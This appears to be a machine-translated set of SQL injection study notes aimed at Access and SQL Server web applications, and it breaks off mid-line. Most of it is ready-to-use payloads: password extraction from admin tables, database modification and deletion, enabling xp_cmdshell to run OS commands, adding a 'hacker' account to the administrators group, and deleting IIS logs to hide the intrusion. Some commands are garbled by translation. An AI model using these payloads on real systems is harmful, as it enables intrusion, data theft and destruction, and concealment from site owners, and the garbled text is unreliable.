SQL Injection notes

This article can communicate with the author: http://bbs.2cto.com/read.php? Tid = 86980

SQL Injection Study Notes

1. Access

Determine whether injection is allowed:

Http://www.targer.com/article.asp? Id = 6

Http://www.targer.com/article.asp? Id = 6

Http://www.targer.com/article.asp? Id = 6 and 1 = 1

Http://www.targer.com/article.asp? Id = 6 and 1 = 2

Determine the website background database type:

Http://www.targer.com/article.asp? Id = 6 and user> 0

Http://www.targer.com/article.asp? Id = 6 and (select count (*) from msysobjects)> 0

Guess injection:

Article. asp? Id = 6 and exists (select * from admin)

Article. asp? Id = 6 and exists (select password from admin)

Article. asp? Id = 6 and (select top N len (password) from admin)> x

Article. asp? Id = 6 and (select top 1 asc (mid (password, N, 1) from admin) = 97

SQL Injection Access export Webshell: Null

2. SQL Server

Determine whether injection is allowed:

Http://www.targer.com/article.asp? Id = 6

Http://www.targer.com/article.asp? Id = 6

Http://www.targer.com/article.asp? Id = 6 and 1 = 1

Http://www.targer.com/article.asp? Id = 6 and 1 = 2

Http://www.targer.com/article.asp? Action = value and 1 = 1

Http://www.targer.com/article.asp? Action = value and 1 = 2

Searchpoints % and 1 = 1

Searchpoints % and 1 = 2

Determine the database type:

Http://www.targer.com/article.asp? Id = 6 and user> 0

Http://www.targer.com/article.asp? Id = 6 and (select count (*) from sysobjects)> 0

Query the current user data:

Article. asp? Id = 6 having 1 = 1 --

Columns in the current table:

Article. asp? Id = 6 group by admin. username having 1 = 1 --

Article. asp? Id = 6 group by admin. username, admin. password having 1 = 1 --

Arbitrary tables and columns:

And (select top 1 name from (select top N id, name from sysobjects where xtype = char (85) T order by id desc)> 1

And (select top col_name (object_id (admin), N) from sysobjects)> 1

Violent database data:

And (select top 1 password from admin where id = N)> 1

Modify data in the database:

; Update admin set password = oooooo where username = xxx

Add data in the database:

; Insert into admin values (xxx, Oooooooo )--

Delete database:

; Drop database webdata

Get the current database username: and user> 0

Get the current database name: and db_name ()> 0

Obtain the database version: and (select @ version)> 0

Determine whether multi-sentence queries are supported:; declare @ a int --

Determine whether subqueries are supported: and (select count (1) from [sysobjects])> = 0

Extended database Stored Procedure: exec master .. xp_mongoshell

View the directory of server c:; exec_master .. xp_cmdshell dir c:

Determine whether the extended stored procedure exists: and select count (*) from master. dbo. sysobjects where xtype = x and name = xp_mongoshell

Restore extended stored procedure:; exec sp_addextendedproc xp_mongoshell, xplog70.dll

Delete the extended stored procedure:; exec sp_dropextendedproc xp_mongoshell

MSSQL2000 provides some functions for indirectly obtaining permissions to access OLE objects:

; Declare @ s int

; Exec sp_oacreat wscript. shell, @ s

; Exec master .. spoamethod @s,run,null,cmd.exe/c dir c:

Determine whether the current database user name has high permissions:

And 1 = (select is_srvrolemember (sysadmin ))

And 1 = (select is_srvrolemember (serveradmin ))

And 1 = (select is_srvrolemember (setupadmin ))

And 1 = (select is_srvrolemember (securityadmin ))

And 1 = (select is_srvrolemember (diskadmin ))

And 1 = (select is_srvrolemember (bulkadmin ))

Determine whether the current database user name is DB_OWNER:

And 1 = (select is_member (db_owner ))

All database information in the SQLSERVER database system is stored in the master. dbo. sysdatabases table of SQLSERVER. You only need the PUBLIC permission to SELECT the table:

And (select top 1 name from master. dbo. sysdatabase order by dbid)> 0

And (select top 1 name from master. dbo. sysdatabase where name not in (select top 1 name from master. dbo. sysdatabases order by dbid)> 0

Delete log records:

; Exec master. dbo. xp_cmdshell del c: winntsystem32logfilesw3svc5ex070606. log> c: emp.txt

Replace log records:

; Exec master. dbo. xp_shareshell copy c: winntsystem32logfilesw3svc5ex070404. log c: winntsystem32logfilesw3svc5ex070606. log> c: emp.txt

Obtain the WEB path:

; Declare @ shell int

; Exec master .. sp_oamethod wscript. shell, @ shell out

; Exec master .. sp_oamethod @shell,run,null,cmd.exe/c dir/s d:/index. asp> c:/log.txt

Search by XP_CMDSHELL:

; Exec master .. xp_cmdshell dir/s d:/index. asp

Command for displaying server website configuration information:

Cmd/c cscript.exe c: inetpubadminscriptadsutil. vbs enum w3svc/1/root

Cmd/c cscript.exe c: inetpubadminscriptadsutil. vbs enum w3svc/2/root

Use XP_REGREAD to read data with PUBLIC permissions:

; Exec master. dbo. xp_regread

Hkey_local_machine,

Systemcurrentcontrolsetservicesw3svcparametersvirtual roots

/

For more information about the advanced technologies of SQLSERVER, see chapter 5 of proficient script hacker by Zeng yunhao.

3. DSqlHelper

Check permission SYSADMIN:

And 1 = (select IS_SRVROLEMEMBER (sysadmin ))

Serveradmin, setupadmin, securityadmin, diskadmin, bulkadmin, and db_owner.

Check XP_CMDSHELL (CMD command ):

And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = xp_mongoshell)

Check XP_REGREAD (Registry READ function ):

And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = xp_regread)

Check SP_MAKEWEBTASK (backup function ):

And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = sp_makewebtask)

Test SP_ADDEXTENDEDPROC:

And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = sp_addextendedproc)

Check the XP_SUBDIRS read subdirectory:

And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = xp_subdirs)

Check the XP_DIRTREE read subdirectory:

And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = xp_dirtree)

Modification content:

; UPDATE table name set field = content where 1 = 1

Xp_mongoshell Detection:

; Exec master .. xp_cmdshell dir c:

Fix XP_CMDSHELL:

; Exec master. dbo. sp_addextendedproc xp_mongoshell, xplog70.dll

Use XP_CMDSHELL to add a user hacker:

; Exec master. dbo. xp_mongoshell net user hacker 123456/add

Xp_mongoshell adds the user hacker to the ADMIN group:

; Exec master. dbo. xp_mongoshell net localgroup administrators hacker/add

Create Table test:

; Create table [dbo]. [test] ([dstr] [char] (255 ));

Test:

And ex